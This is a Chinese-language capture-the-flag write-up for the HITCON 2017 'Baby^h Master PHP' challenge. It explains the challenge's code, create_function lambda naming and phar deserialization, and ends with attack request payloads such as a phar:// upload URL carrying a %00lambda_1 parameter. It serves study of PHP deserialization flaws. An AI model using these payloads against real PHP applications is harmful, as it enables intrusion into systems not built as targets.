github编辑

[HITCON 2017]Baby^h Master PHP

[HITCON 2017]Baby^h Master PHP

考点

  • 代码审计

  • create_function生成的匿名函数特性

  • phar反序列化

wp

第一段:初始条件

看一下初始的条件

$FLAG = create_function("", 'die(`/read_flag`);'); 
$SECRET = `/read_secret`;
$SANDBOX = "/var/www/data/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);
@mkdir($SANDBOX);
@chdir($SANDBOX);

首先回顾一下create_function是啥

create_function('$a','echo $a;')等价于创建一个匿名函数,它的名字是\x00lambda_%d

第一行等同于

这个初始过程是:获取FLAG,获取密钥,生成沙盒

防止在公共靶机下出现啥bug

第二段:输入

看一下输入在哪儿

有三种模式,uploadshow以及其它

第三段:upload模式

无论哪个模式都会执行check_session函数,那就看一下

先获取cookie中的session-data,我这里是O%3A4%3A%22User%22%3A1%3A%7Bs%3A6%3A%22avatar%22%3Bs%3A46%3A%22%2Fvar%2Fwww%2Fdata%2F0f3cd5989359bdd5a04508bf19418e31%22%3B%7D-----73dcb35650323907c141d8988a5d0d962396fbbe

那它怎么来的呢,可以看到,dataUser类序列化的内容,而hmachash_hmac("sha1", $data, $SECRET)的结果

然后将cookie进行分割,还原出datahmac。并对datahmac再做一次校验,验证hmac是否由hash_hmac("sha1", $data, $SECRET)生成。是的话对data进行反序列化,然后返回它的avatar属性。

upload模式下,还会再去执行upload()函数,这里的path参数就是自己的沙盒地址

然后从外部获取url下的avatar.gif,覆盖掉沙盒的那个avatar.gif

第四段:show模式

show模式下,在check_session()获取沙盒地址后,判断这个地址下的avatar.gif存不存在,存在的话就返回这个avatar.gif

第五段:查漏

整体看完了,发现Admin类好像没有用到,这里大概就是最终要利用的地方

__destruct里面定义一个随机函数,执行这个随机函数可以获取flag,但是直接执行初始的匿名函数就可以了

思路

很明显的phar反序列化,生成Admin类的phar文件,通过upload函数触发phar反序列化,然后执行匿名函数

最后一段引用官方wp原文

但是我们并不能知道当前的匿名函数到底有多少个, 因为每访问一次题目就会生成一个匿名函数; 最后就引出了最后一个考点, Apache-prefork模型(默认模型)在接受请求后会如何处理,首先Apache会默认生成5个child server去等待用户连接, 默认最高可生成256个child server, 这时候如果用户大量请求, Apache就会在处理完MaxRequestsPerChild个tcp连接后kill掉这个进程,开启一个新进程处理请求(这里猜测Orange大大应该修改了默认的0,因为0为永不kill掉子进程 这样就无法fork出新进程了) 在这个新进程里面匿名函数就会是从1开始的了

  1. 生成phar放在自己的服务器上

  2. 上传文件?c=upload&url=http://ip

  3. 写个脚本一直请求?m=upload&url=phar:///var/www/data/***&lucky=%00lambda_1

最后更新于